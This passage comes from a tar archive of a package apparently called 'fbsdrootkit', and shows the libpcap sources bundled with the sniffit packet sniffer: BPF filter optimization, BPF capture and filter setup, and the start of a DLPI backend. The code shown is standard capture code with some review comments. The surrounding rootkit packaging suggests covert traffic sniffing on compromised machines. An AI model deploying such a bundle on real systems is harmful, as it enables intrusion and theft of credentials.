s->code = NOP; break; } if (op == BPF_MUL || op == BPF_AND) { s->code = BPF_LD|BPF_IMM; val[A_ATOM] = K(s->k); break; } } if (vmap[val[A_ATOM]].is_const) { fold_op(s, val[A_ATOM], K(s->k)); val[A_ATOM] = K(s->k); break; } } val[A_ATOM] = F(s->code, val[A_ATOM], K(s->k)); break; case BPF_ALU|BPF_ADD|BPF_X: case BPF_ALU|BPF_SUB|BPF_X: case BPF_ALU|BPF_MUL|BPF_X: case BPF_ALU|BPF_DIV|BPF_X: case BPF_ALU|BPF_AND|BPF_X: case BPF_ALU|BPF_OR|BPF_X: case BPF_ALU|BPF_LSH|BPF_X: case BPF_ALU|BPF_RSH|BPF_X: op = 
BPF_OP(s->code); if (alter && vmap[val[X_ATOM]].is_const) { if (vmap[val[A_ATOM]].is_const) { fold_op(s, val[A_ATOM], val[X_ATOM]); val[A_ATOM] = K(s->k); } else { s->code = BPF_ALU|BPF_K|op; s->k = vmap[val[X_ATOM]].const_val; done = 0; val[A_ATOM] = F(s->code, val[A_ATOM], K(s->k)); } break; } /* * Check if we're doing something to an accumulator * that is 0, and simplify. This may not seem like * much of a simplification but it could open up further * optimizations. * XXX We could also check for mul by 1, and -1, etc. */ if (alter && vmap[val[A_ATOM]].is_const && vmap[val[A_ATOM]].const_val == 0) { if (op == BPF_ADD || op == BPF_OR || op == BPF_LSH || op == BPF_RSH || op == BPF_SUB) { s->code = BPF_MISC|BPF_TXA; vstore(s, &val[A_ATOM], val[X_ATOM], alter); break; } else if (op == BPF_MUL || op == BPF_DIV || op == BPF_AND) { s->code = BPF_LD|BPF_IMM; s->k = 0; vstore(s, &val[A_ATOM], K(s->k), alter); break; } else if (op == BPF_NEG) { s->code = NOP; break; } } val[A_ATOM] = F(s->code, val[A_ATOM], val[X_ATOM]); break; case BPF_MISC|BPF_TXA: vstore(s, &val[A_ATOM], val[X_ATOM], alter); break; case BPF_LD|BPF_MEM: v = val[s->k]; if (alter && vmap[v].is_const) { s->code = BPF_LD|BPF_IMM; s->k = vmap[v].const_val; done = 0; } vstore(s, &val[A_ATOM], v, alter); break; case BPF_MISC|BPF_TAX: vstore(s, &val[X_ATOM], val[A_ATOM], alter); break; case BPF_LDX|BPF_MEM: v = val[s->k]; if (alter && vmap[v].is_const) { s->code = BPF_LDX|BPF_IMM; s->k = vmap[v].const_val; done = 0; } vstore(s, &val[X_ATOM], v, alter); break; case BPF_ST: vstore(s, &val[s->k], val[A_ATOM], alter); break; case BPF_STX: vstore(s, &val[s->k], val[X_ATOM], alter); break; } } static void deadstmt(s, last) register struct stmt *s; register struct stmt *last[]; { register int atom; atom = atomuse(s); if (atom >= 0) { if (atom == AX_ATOM) { last[X_ATOM] = 0; last[A_ATOM] = 0; } else last[atom] = 0; } atom = atomdef(s); if (atom >= 0) { if (last[atom]) { done = 0; last[atom]->code = NOP; } last[atom] = 
s; } } static void opt_deadstores(b) register struct block *b; { register struct slist *s; register int atom; struct stmt *last[N_ATOMS]; memset((char *)last, 0, sizeof last); for (s = b->stmts; s != 0; s = s->next) deadstmt(&s->s, last); deadstmt(&b->s, last); for (atom = 0; atom < N_ATOMS; ++atom) if (last[atom] && !ATOMELEM(b->out_use, atom)) { last[atom]->code = NOP; done = 0; } } static void opt_blk(b, do_stmts) struct block *b; int do_stmts; { struct slist *s; struct edge *p; int i; long aval; /* * Initialize the atom values. * If we have no predecessors, everything is undefined. * Otherwise, we inherent our values from our predecessors. * If any register has an ambiguous value (i.e. control paths are * merging) give it the undefined value of 0. */ p = b->in_edges; if (p == 0) memset((char *)b->val, 0, sizeof(b->val)); else { memcpy((char *)b->val, (char *)p->pred->val, sizeof(b->val)); while ((p = p->next) != NULL) { for (i = 0; i < N_ATOMS; ++i) if (b->val[i] != p->pred->val[i]) b->val[i] = 0; } } aval = b->val[A_ATOM]; for (s = b->stmts; s; s = s->next) opt_stmt(&s->s, b->val, do_stmts); /* * This is a special case: if we don't use anything from this * block, and we load the accumulator with value that is * already there, eliminate all the statements. */ if (do_stmts && b->out_use == 0 && aval != 0 && b->val[A_ATOM] == aval) b->stmts = 0; else { opt_peep(b); opt_deadstores(b); } /* * Set up values for branch optimizer. */ if (BPF_SRC(b->s.code) == BPF_K) b->oval = K(b->s.k); else b->oval = b->val[X_ATOM]; b->et.code = b->s.code; b->ef.code = -b->s.code; } /* * Return true if any register that is used on exit from 'succ', has * an exit value that is different from the corresponding exit value * from 'b'. 
*/ static int use_conflict(b, succ) struct block *b, *succ; { int atom; atomset use = succ->out_use; if (use == 0) return 0; for (atom = 0; atom < N_ATOMS; ++atom) if (ATOMELEM(use, atom)) if (b->val[atom] != succ->val[atom]) return 1; return 0; } static struct block * fold_edge(child, ep) struct block *child; struct edge *ep; { int sense; int aval0, aval1, oval0, oval1; int code = ep->code; if (code < 0) { code = -code; sense = 0; } else sense = 1; if (child->s.code != code) return 0; aval0 = child->val[A_ATOM]; oval0 = child->oval; aval1 = ep->pred->val[A_ATOM]; oval1 = ep->pred->oval; if (aval0 != aval1) return 0; if (oval0 == oval1) /* * The operands are identical, so the * result is true if a true branch was * taken to get here, otherwise false. */ return sense ? JT(child) : JF(child); if (sense && code == (BPF_JMP|BPF_JEQ|BPF_K)) /* * At this point, we only know the comparison if we * came down the true branch, and it was an equality * comparison with a constant. We rely on the fact that * distinct constants have distinct value numbers. */ return JF(child); return 0; } static void opt_j(ep) struct edge *ep; { register int i, k; register struct block *target; if (JT(ep->succ) == 0) return; if (JT(ep->succ) == JF(ep->succ)) { /* * Common branch targets can be eliminated, provided * there is no data dependency. */ if (!use_conflict(ep->pred, ep->succ->et.succ)) { done = 0; ep->succ = JT(ep->succ); } } /* * For each edge dominator that matches the successor of this * edge, promote the edge successor to the its grandchild. * * XXX We violate the set abstraction here in favor a reasonably * efficient loop. */ top: for (i = 0; i < edgewords; ++i) { register u_long x = ep->edom[i]; while (x != 0) { k = ffs(x) - 1; x &=~ (1 << k); k += i * BITS_PER_WORD; target = fold_edge(ep->succ, edges[k]); /* * Check that there is no data dependency between * nodes that will be violated if we move the edge. 
*/ if (target != 0 && !use_conflict(ep->pred, target)) { done = 0; ep->succ = target; if (JT(target) != 0) /* * Start over unless we hit a leaf. */ goto top; return; } } } } static void or_pullup(b) struct block *b; { int val, at_top; struct block *pull; struct block **diffp, **samep; struct edge *ep; ep = b->in_edges; if (ep == 0) return; /* * Make sure each predecessor loads the same value. * XXX why? */ val = ep->pred->val[A_ATOM]; for (ep = ep->next; ep != 0; ep = ep->next) if (val != ep->pred->val[A_ATOM]) return; if (JT(b->in_edges->pred) == b) diffp = &JT(b->in_edges->pred); else diffp = &JF(b->in_edges->pred); at_top = 1; while (1) { if (*diffp == 0) return; if (JT(*diffp) != JT(b)) return; if (!SET_MEMBER((*diffp)->dom, b->id)) return; if ((*diffp)->val[A_ATOM] != val) break; diffp = &JF(*diffp); at_top = 0; } samep = &JF(*diffp); while (1) { if (*samep == 0) return; if (JT(*samep) != JT(b)) return; if (!SET_MEMBER((*samep)->dom, b->id)) return; if ((*samep)->val[A_ATOM] == val) break; /* XXX Need to check that there are no data dependencies between dp0 and dp1. Currently, the code generator will not produce such dependencies. */ samep = &JF(*samep); } #ifdef notdef /* XXX This doesn't cover everything. */ for (i = 0; i < N_ATOMS; ++i) if ((*samep)->val[i] != pred->val[i]) return; #endif /* Pull up the node. */ pull = *samep; *samep = JF(pull); JF(pull) = *diffp; /* * At the top of the chain, each predecessor needs to point at the * pulled up node. Inside the chain, there is only one predecessor * to worry about. */ if (at_top) { for (ep = b->in_edges; ep != 0; ep = ep->next) { if (JT(ep->pred) == b) JT(ep->pred) = pull; else JF(ep->pred) = pull; } } else *diffp = pull; done = 0; } static void and_pullup(b) struct block *b; { int val, at_top; struct block *pull; struct block **diffp, **samep; struct edge *ep; ep = b->in_edges; if (ep == 0) return; /* * Make sure each predecessor loads the same value. 
*/ val = ep->pred->val[A_ATOM]; for (ep = ep->next; ep != 0; ep = ep->next) if (val != ep->pred->val[A_ATOM]) return; if (JT(b->in_edges->pred) == b) diffp = &JT(b->in_edges->pred); else diffp = &JF(b->in_edges->pred); at_top = 1; while (1) { if (*diffp == 0) return; if (JF(*diffp) != JF(b)) return; if (!SET_MEMBER((*diffp)->dom, b->id)) return; if ((*diffp)->val[A_ATOM] != val) break; diffp = &JT(*diffp); at_top = 0; } samep = &JT(*diffp); while (1) { if (*samep == 0) return; if (JF(*samep) != JF(b)) return; if (!SET_MEMBER((*samep)->dom, b->id)) return; if ((*samep)->val[A_ATOM] == val) break; /* XXX Need to check that there are no data dependencies between diffp and samep. Currently, the code generator will not produce such dependencies. */ samep = &JT(*samep); } #ifdef notdef /* XXX This doesn't cover everything. */ for (i = 0; i < N_ATOMS; ++i) if ((*samep)->val[i] != pred->val[i]) return; #endif /* Pull up the node. */ pull = *samep; *samep = JT(pull); JT(pull) = *diffp; /* * At the top of the chain, each predecessor needs to point at the * pulled up node. Inside the chain, there is only one predecessor * to worry about. */ if (at_top) { for (ep = b->in_edges; ep != 0; ep = ep->next) { if (JT(ep->pred) == b) JT(ep->pred) = pull; else JF(ep->pred) = pull; } } else *diffp = pull; done = 0; } static void opt_blks(root, do_stmts) struct block *root; int do_stmts; { int i, maxlevel; struct block *p; init_val(); maxlevel = root->level; for (i = maxlevel; i >= 0; --i) for (p = levels[i]; p; p = p->link) opt_blk(p, do_stmts); if (do_stmts) /* * No point trying to move branches; it can't possibly * make a difference at this point. 
*/ return; for (i = 1; i <= maxlevel; ++i) { for (p = levels[i]; p; p = p->link) { opt_j(&p->et); opt_j(&p->ef); } } for (i = 1; i <= maxlevel; ++i) { for (p = levels[i]; p; p = p->link) { or_pullup(p); and_pullup(p); } } } static inline void link_inedge(parent, child) struct edge *parent; struct block *child; { parent->next = child->in_edges; child->in_edges = parent; } static void find_inedges(root) struct block *root; { int i; struct block *b; for (i = 0; i < n_blocks; ++i) blocks[i]->in_edges = 0; /* * Traverse the graph, adding each edge to the predecessor * list of its successors. Skip the leaves (i.e. level 0). */ for (i = root->level; i > 0; --i) { for (b = levels[i]; b != 0; b = b->link) { link_inedge(&b->et, JT(b)); link_inedge(&b->ef, JF(b)); } } } static void opt_root(b) struct block **b; { struct slist *tmp, *s; s = (*b)->stmts; (*b)->stmts = 0; while (BPF_CLASS((*b)->s.code) == BPF_JMP && JT(*b) == JF(*b)) *b = JT(*b); tmp = (*b)->stmts; if (tmp != 0) sappend(s, tmp); (*b)->stmts = s; } static void opt_loop(root, do_stmts) struct block *root; int do_stmts; { #ifdef BDEBUG if (dflag > 1) opt_dump(root); #endif do { done = 1; find_levels(root); find_dom(root); find_closure(root); find_inedges(root); find_ud(root); find_edom(root); opt_blks(root, do_stmts); #ifdef BDEBUG if (dflag > 1) opt_dump(root); #endif } while (!done); } /* * Optimize the filter code in its dag representation. */ void bpf_optimize(rootp) struct block **rootp; { struct block *root; root = *rootp; opt_init(root); opt_loop(root, 0); opt_loop(root, 1); intern_blocks(root); opt_root(rootp); opt_cleanup(); } static void make_marks(p) struct block *p; { if (!isMarked(p)) { Mark(p); if (BPF_CLASS(p->s.code) != BPF_RET) { make_marks(JT(p)); make_marks(JF(p)); } } } /* * Mark code array such that isMarked(i) is true * only for nodes that are alive. 
*/
static void
mark_code(p)
	struct block *p;
{
	/* Advance the current mark, then mark what is reachable from 'p'. */
	++cur_mark;
	make_marks(p);
}

/*
 * True iff the two stmt lists load the same value from the packet into
 * the accumulator.  NOP entries are skipped on both sides; the remaining
 * statements must agree pairwise in 'code' and 'k'.
 */
static int
eq_slist(x, y)
	struct slist *x, *y;
{
	for (;;) {
		/* Step over statements the optimizer has turned into NOPs. */
		while (x != 0 && x->s.code == NOP)
			x = x->next;
		while (y != 0 && y->s.code == NOP)
			y = y->next;

		/* Equal only if both lists run out at the same time. */
		if (x == 0 || y == 0)
			return x == 0 && y == 0;

		if (x->s.code != y->s.code || x->s.k != y->s.k)
			return 0;

		x = x->next;
		y = y->next;
	}
}

/*
 * True iff the two blocks have the same branch statement, the same
 * true/false successors, and equivalent statement lists.
 */
static inline int
eq_blk(b0, b1)
	struct block *b0, *b1;
{
	if (b0->s.code != b1->s.code || b0->s.k != b1->s.k)
		return 0;
	if (b0->et.succ != b1->et.succ || b0->ef.succ != b1->ef.succ)
		return 0;
	return eq_slist(b0->stmts, b1->stmts);
}

/*
 * Merge equivalent live blocks.  Each pass clears every 'link', marks the
 * live blocks, points the 'link' of a block at an equivalent block with a
 * higher index, and then redirects jumps through those links.  Passes are
 * repeated until one of them changes nothing.
 */
static void
intern_blocks(root)
	struct block *root;
{
	struct block *blk, *rep;
	int i, j;
	int settled;	/* local flag; the file-scope 'done' is not touched */

	do {
		settled = 1;

		for (i = 0; i < n_blocks; ++i)
			blocks[i]->link = 0;

		mark_code(root);

		/* The last block has no higher-indexed candidate; start below it. */
		for (i = n_blocks - 2; i >= 0; --i) {
			if (!isMarked(blocks[i]))
				continue;
			for (j = i + 1; j < n_blocks; ++j) {
				if (!isMarked(blocks[j]))
					continue;
				if (!eq_blk(blocks[i], blocks[j]))
					continue;
				/* Follow an existing link so chains stay one hop long. */
				rep = blocks[j]->link;
				if (rep == 0)
					rep = blocks[j];
				blocks[i]->link = rep;
				break;
			}
		}

		for (i = 0; i < n_blocks; ++i) {
			blk = blocks[i];
			/* Blocks without a true branch have no jumps to redirect. */
			if (JT(blk) == 0)
				continue;
			if (JT(blk)->link) {
				settled = 0;
				JT(blk) = JT(blk)->link;
			}
			if (JF(blk)->link) {
				settled = 0;
				JF(blk) = JF(blk)->link;
			}
		}
	} while (!settled);
}

/*
 * Release the tables used by the optimizer.
 */
static void
opt_cleanup()
{
	free(vnode_base);
	free(vmap);
	free(edges);
	free(space);
	free(levels);
	free(blocks);
}

/*
 * Return the number of stmts in 's', not counting NOPs.
 */
static int
slength(s)
	struct slist *s;
{
	int count = 0;

	while (s != 0) {
		if (s->s.code != NOP)
			count++;
		s = s->next;
	}
	return count;
}

/*
 * Return the number of nodes reachable by 'p'.
 * All nodes should be initially unmarked.
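*/
static int
count_blocks(p)
	struct block *p;
{
	if (p == 0 || isMarked(p))
		return 0;
	Mark(p);
	return count_blocks(JT(p)) + count_blocks(JF(p)) + 1;
}

/*
 * Do a depth first search on the flow graph, numbering the
 * basic blocks, and entering them into the 'blocks' array.
 * 'blocks' must already have room for every reachable block.
 */
static void
number_blks_r(p)
	struct block *p;
{
	int n;

	if (p == 0 || isMarked(p))
		return;

	Mark(p);
	n = n_blocks++;
	p->id = n;
	blocks[n] = p;

	number_blks_r(JT(p));
	number_blks_r(JF(p));
}

/*
 * Return the number of stmts in the flowgraph reachable by 'p'.
 * The nodes should be unmarked before calling.
 * Each block contributes its non-NOP statements plus one.
 */
static int
count_stmts(p)
	struct block *p;
{
	int n;

	if (p == 0 || isMarked(p))
		return 0;
	Mark(p);
	n = count_stmts(JT(p)) + count_stmts(JF(p));
	return slength(p->stmts) + n + 1;
}

/*
 * Allocate memory.  All allocation is done before optimization
 * is begun.  A linear bound on the size of all data structures is computed
 * from the total number of blocks and/or statements.
 *
 * Every allocation is checked and reported through bpf_error(), which is
 * presumed not to return (other callers in this file rely on that too).
 * NOTE(review): tables allocated before a failing one are not released on
 * that path; confirm how the caller recovers from bpf_error().
 */
static void
opt_init(root)
	struct block *root;
{
	u_long *p;
	int i, n, max_stmts;

	/*
	 * First, count the blocks, so we can malloc an array to map
	 * block number to block.  Then, put the blocks into the array.
	 */
	unMarkAll();
	n = count_blocks(root);
	blocks = (struct block **)malloc(n * sizeof(*blocks));
	if (blocks == NULL)
		bpf_error("malloc");
	unMarkAll();
	n_blocks = 0;
	number_blks_r(root);

	n_edges = 2 * n_blocks;
	edges = (struct edge **)malloc(n_edges * sizeof(*edges));
	if (edges == NULL)
		bpf_error("malloc");

	/*
	 * The number of levels is bounded by the number of nodes.
	 */
	levels = (struct block **)malloc(n_blocks * sizeof(*levels));
	if (levels == NULL)
		bpf_error("malloc");

	edgewords = n_edges / (8 * sizeof(u_long)) + 1;
	nodewords = n_blocks / (8 * sizeof(u_long)) + 1;

	/*
	 * One arena holds, in order: a dominator set and a closure set per
	 * block (nodewords each), then two edge-dominator sets per block
	 * (edgewords each).
	 */
	space = (u_long *)malloc(2 * n_blocks * nodewords * sizeof(*space)
				 + n_edges * edgewords * sizeof(*space));
	if (space == NULL)
		bpf_error("malloc");

	p = space;
	all_dom_sets = p;
	for (i = 0; i < n; ++i) {
		blocks[i]->dom = p;
		p += nodewords;
	}
	all_closure_sets = p;
	for (i = 0; i < n; ++i) {
		blocks[i]->closure = p;
		p += nodewords;
	}
	all_edge_sets = p;
	for (i = 0; i < n; ++i) {
		register struct block *b = blocks[i];

		b->et.edom = p;
		p += edgewords;
		b->ef.edom = p;
		p += edgewords;
		/* True edges take ids [0, n_blocks), false edges the next n_blocks. */
		b->et.id = i;
		edges[i] = &b->et;
		b->ef.id = n_blocks + i;
		edges[n_blocks + i] = &b->ef;
		b->et.pred = b;
		b->ef.pred = b;
	}

	max_stmts = 0;
	for (i = 0; i < n; ++i)
		max_stmts += slength(blocks[i]->stmts) + 1;
	/*
	 * We allocate at most 3 value numbers per statement,
	 * so this is an upper bound on the number of valnodes
	 * we'll need.
	 */
	maxval = 3 * max_stmts;
	vmap = (struct vmapinfo *)malloc(maxval * sizeof(*vmap));
	if (vmap == NULL)
		bpf_error("malloc");
	/*
	 * Size the node pool by its own element type.  struct valnode is
	 * larger than struct vmapinfo, so sizing it with sizeof(*vmap)
	 * under-allocates the pool that F() hands out via next_vnode++ and
	 * lets value numbering write past the end of the heap block.
	 */
	vnode_base = (struct valnode *)malloc(maxval * sizeof(*vnode_base));
	if (vnode_base == NULL)
		bpf_error("malloc");
}

/*
 * Some pointers used to convert the basic block form of the code,
 * into the array form that BPF requires.  'fstart' will point to
 * the malloc'd array while 'ftail' is used during the recursive traversal.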
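*/
static struct bpf_insn *fstart;
static struct bpf_insn *ftail;

#ifdef BDEBUG
int bids[1000];
#endif

/*
 * Emit the block 'p' and everything reachable from it into the array that
 * starts at 'fstart'.  Successors are emitted first and 'ftail' moves
 * backwards, so a block always lands in front of its jump targets and the
 * relative offsets computed below are forward offsets.
 */
static void
convert_code_r(p)
	struct block *p;
{
	struct bpf_insn *dst;
	struct slist *src;
	int slen;
	u_int off;

	if (p == 0 || isMarked(p))
		return;
	Mark(p);

	convert_code_r(JF(p));
	convert_code_r(JT(p));

	/* Reserve room for the non-NOP statements plus the block's own insn. */
	slen = slength(p->stmts);
	dst = ftail -= slen + 1;

	p->offset = dst - fstart;

	for (src = p->stmts; src; src = src->next) {
		if (src->s.code == NOP)
			continue;
		dst->code = (u_short)src->s.code;
		dst->k = src->s.k;
		++dst;
	}
#ifdef BDEBUG
	/* bids[] is a fixed-size debug table; do not index past its end. */
	if ((size_t)(dst - fstart) < sizeof(bids) / sizeof(bids[0]))
		bids[dst - fstart] = p->id + 1;
#endif
	dst->code = (u_short)p->s.code;
	dst->k = p->s.k;
	if (JT(p)) {
		/* jt/jf are stored after this range check; offsets >= 256 are rejected. */
		off = JT(p)->offset - (p->offset + slen) - 1;
		if (off >= 256)
			bpf_error("long jumps not supported");
		dst->jt = off;
		off = JF(p)->offset - (p->offset + slen) - 1;
		if (off >= 256)
			bpf_error("long jumps not supported");
		dst->jf = off;
	}
}

/*
 * Convert flowgraph intermediate representation to the
 * BPF array representation.  Set *lenp to the number of instructions.
 *
 * Returns a malloc'd, zero-filled array of *lenp instructions; opt_dump()
 * below releases its copy with free().  An allocation failure is reported
 * through bpf_error() instead of being passed on to memset().
 */
struct bpf_insn *
icode_to_fcode(root, lenp)
	struct block *root;
	int *lenp;
{
	int n;
	struct bpf_insn *fp;

	unMarkAll();
	n = *lenp = count_stmts(root);

	fp = (struct bpf_insn *)malloc(sizeof(*fp) * n);
	if (fp == NULL)
		bpf_error("malloc");
	memset((char *)fp, 0, sizeof(*fp) * n);
	fstart = fp;
	ftail = fp + n;

	unMarkAll();
	convert_code_r(root);

	return fp;
}

#ifdef BDEBUG
/*
 * Debug aid: convert the current flow graph to BPF code, dump it, and
 * free the temporary instruction array.
 */
opt_dump(root)
	struct block *root;
{
	struct bpf_program f;

	memset(bids, 0, sizeof bids);
	f.bf_insns = icode_to_fcode(root, &f.bf_len);
	bpf_dump(&f, 1);
	putchar('\n');
	free((char *)f.bf_insns);
}
#endif
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-bpf.c100400 764 764 12740 6226213211 16520 0ustar dfdf/* * Copyright (c) 1993, 1994 * The Regents of the University of California. All rights reserved. 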
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
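*/
#ifndef lint
static char rcsid[] =
    "@(#)$Header: pcap-bpf.c,v 1.14 94/06/03 19:58:49 leres Exp $ (LBL)";
#endif

/*
 * NOTE(review): the header names on the bare #include lines below are
 * missing in this copy of the file; the lines are kept as found.
 */
#include
#include
#include
#include
#include
#include /* optionally get BSD define */
#include
#include
#include
#include
#include
#include
#include
#include

#include "pcap-int.h"

/*
 * Fetch the kernel's receive/drop counters for the BPF descriptor.
 * Returns 0 on success, or -1 with a message in p->errbuf.
 */
int
pcap_stats(pcap_t *p, struct pcap_stat *ps)
{
	struct bpf_stat s;

	if (ioctl(p->fd, BIOCGSTATS, &s) < 0) {
		snprintf(p->errbuf, sizeof(p->errbuf), "BIOCGSTATS: %s",
		    pcap_strerror(errno));
		return (-1);
	}

	ps->ps_recv = s.bs_recv;
	ps->ps_drop = s.bs_drop;
	return (0);
}

/*
 * Read one buffer from the BPF descriptor (or resume the buffer left over
 * from the previous call) and invoke 'callback' once per packet.
 * Stops early once 'cnt' packets were delivered when cnt > 0.
 * Returns the number of packets delivered, 0 on EWOULDBLOCK, or -1 with
 * a message in p->errbuf.
 */
int
pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user)
{
	int cc;
	int n = 0;
	register u_char *bp, *ep;

 again:
	cc = p->cc;
	if (p->cc == 0) {
		cc = read(p->fd, (char *)p->buffer, p->bufsize);
		if (cc < 0) {
			/* Don't choke when we get ptraced */
			switch (errno) {

			case EINTR:
				goto again;

			case EWOULDBLOCK:
				return (0);
#if defined(sun) && !defined(BSD)
			/*
			 * Due to a SunOS bug, after 2^31 bytes, the kernel
			 * file offset overflows and read fails with EINVAL.
			 * The lseek() to 0 will fix things.
			 */
			case EINVAL:
				if ((long)(tell(p->fd) + p->bufsize) < 0) {
					(void)lseek(p->fd, 0, 0);
					goto again;
				}
				/* fall through */
#endif
			}
			snprintf(p->errbuf, sizeof(p->errbuf), "read: %s",
			    pcap_strerror(errno));
			return (-1);
		}
		bp = p->buffer;
	} else
		bp = p->bp;

	/*
	 * Loop through each packet.
	 *
	 * NOTE(review): bh_caplen and bh_hdrlen are taken from the buffer
	 * as filled by read() and are not checked against 'ep' before the
	 * callback is given bp + hdrlen; this trusts the BPF device to
	 * produce well-formed records.
	 */
#define bhp ((struct bpf_hdr *)bp)
	ep = bp + cc;
	while (bp < ep) {
		register int caplen, hdrlen;
		caplen = bhp->bh_caplen;
		hdrlen = bhp->bh_hdrlen;
		/*
		 * XXX A bpf_hdr matches a pcap_pkthdr.
		 */
		(*callback)(user, (struct pcap_pkthdr*)bp, bp + hdrlen);
		bp += BPF_WORDALIGN(caplen + hdrlen);
		if (++n >= cnt && cnt > 0) {
			/* Remember where to resume on the next call. */
			p->bp = bp;
			p->cc = ep - bp;
			return (n);
		}
	}
#undef bhp
	p->cc = 0;
	return (n);
}

/*
 * Open the first BPF minor device that is not busy.
 * Returns the descriptor, or a negative value with a message in 'errbuf'
 * (assumed to hold at least PCAP_ERRBUF_SIZE bytes).
 */
static inline int
bpf_open(pcap_t *p, char *errbuf)
{
	int fd;
	int n = 0;
	/* Sized for any int minor number, so the name can never overrun. */
	char device[sizeof "/dev/bpf0000000000"];

	/*
	 * Go through all the minors and find one that isn't in use.
	 */
	do {
		(void)snprintf(device, sizeof(device), "/dev/bpf%d", n++);
		fd = open(device, O_RDONLY);
	} while (fd < 0 && errno == EBUSY);

	/*
	 * XXX better message for all minors used
	 */
	if (fd < 0)
		snprintf(errbuf, PCAP_ERRBUF_SIZE, "%s: %s", device,
		    pcap_strerror(errno));

	return (fd);
}

/*
 * Open a live capture on interface 'device' through BPF.
 *
 * snaplen is stored as the snapshot length, promisc requests promiscuous
 * mode (failure to set it is ignored), and to_ms is the read timeout in
 * milliseconds (0 leaves the timeout unset).
 *
 * Returns a malloc'd pcap_t, or NULL with a message in 'ebuf'.  'ebuf' is
 * assumed to hold at least PCAP_ERRBUF_SIZE bytes; every message written
 * to it is bounded by that size because 'device' is caller-supplied and
 * of arbitrary length.
 */
pcap_t *
pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf)
{
	int fd = -1;
	struct ifreq ifr;
	struct bpf_version bv;
	u_int v;
	pcap_t *p;

	p = (pcap_t *)malloc(sizeof(*p));
	if (p == NULL) {
		snprintf(ebuf, PCAP_ERRBUF_SIZE, "malloc: %s",
		    pcap_strerror(errno));
		return (NULL);
	}
	bzero(p, sizeof(*p));
	fd = bpf_open(p, ebuf);
	if (fd < 0)
		goto bad;

	p->fd = fd;
	p->snapshot = snaplen;

	if (ioctl(fd, BIOCVERSION, (caddr_t)&bv) < 0) {
		snprintf(ebuf, PCAP_ERRBUF_SIZE, "BIOCVERSION: %s",
		    pcap_strerror(errno));
		goto bad;
	}
	if (bv.bv_major != BPF_MAJOR_VERSION ||
	    bv.bv_minor < BPF_MINOR_VERSION) {
		snprintf(ebuf, PCAP_ERRBUF_SIZE,
		    "kernel bpf filter out of date");
		goto bad;
	}
	/* strncpy() alone leaves an over-long name unterminated. */
	(void)strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name) - 1);
	ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
	if (ioctl(fd, BIOCSETIF, (caddr_t)&ifr) < 0) {
		snprintf(ebuf, PCAP_ERRBUF_SIZE, "%s: %s", device,
		    pcap_strerror(errno));
		goto bad;
	}
	/* Get the data link layer type. */
	if (ioctl(fd, BIOCGDLT, (caddr_t)&v) < 0) {
		snprintf(ebuf, PCAP_ERRBUF_SIZE, "BIOCGDLT: %s",
		    pcap_strerror(errno));
		goto bad;
	}
	p->linktype = v;

	/* set timeout */
	if (to_ms != 0) {
		struct timeval to;
		to.tv_sec = to_ms / 1000;
		/* Reduce before scaling so large timeouts cannot overflow int. */
		to.tv_usec = (to_ms % 1000) * 1000;
		if (ioctl(p->fd, BIOCSRTIMEOUT, (caddr_t)&to) < 0) {
			snprintf(ebuf, PCAP_ERRBUF_SIZE, "BIOCSRTIMEOUT: %s",
			    pcap_strerror(errno));
			goto bad;
		}
	}
	if (promisc)
		/* set promiscuous mode, okay if it fails */
		(void)ioctl(p->fd, BIOCPROMISC, NULL);

	if (ioctl(fd, BIOCGBLEN, (caddr_t)&v) < 0) {
		snprintf(ebuf, PCAP_ERRBUF_SIZE, "BIOCGBLEN: %s",
		    pcap_strerror(errno));
		goto bad;
	}
	p->bufsize = v;
	p->buffer = (u_char*)malloc(p->bufsize);
	if (p->buffer == NULL) {
		snprintf(ebuf, PCAP_ERRBUF_SIZE, "malloc: %s",
		    pcap_strerror(errno));
		goto bad;
	}

	return (p);
 bad:
	/* Release the BPF descriptor too, not only the handle. */
	if (fd >= 0)
		(void)close(fd);
	free(p);
	return (NULL);
}

/*
 * Install a filter program.  When p->sf.rfile is set the program is only
 * copied into p->fcode; otherwise it is handed to the kernel with
 * BIOCSETF.  Returns 0 on success, or -1 with a message in p->errbuf.
 */
int
pcap_setfilter(pcap_t *p, struct bpf_program *fp)
{
	if (p->sf.rfile != NULL)
		p->fcode = *fp;
	else if (ioctl(p->fd, BIOCSETF, (caddr_t)fp) < 0) {
		snprintf(p->errbuf, sizeof(p->errbuf), "BIOCSETF: %s",
		    pcap_strerror(errno));
		return (-1);
	}
	return (0);
}
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-dlpi.c100600 764 764 26414 6226213211 16706 0ustar dfdf/* * Copyright (c) 1993, 1994, 1995 * The Regents of the University of California. All rights reserved. 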
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * This code contributed by Atanu Ghosh (atanu@cs.ucl.ac.uk), * University College London. */ #ifndef lint static char rcsid[] = "@(#)$Header: pcap-dlpi.c,v 1.22+ 94/10/12 20:08:15 leres Exp $ (LBL)"; #endif /* * 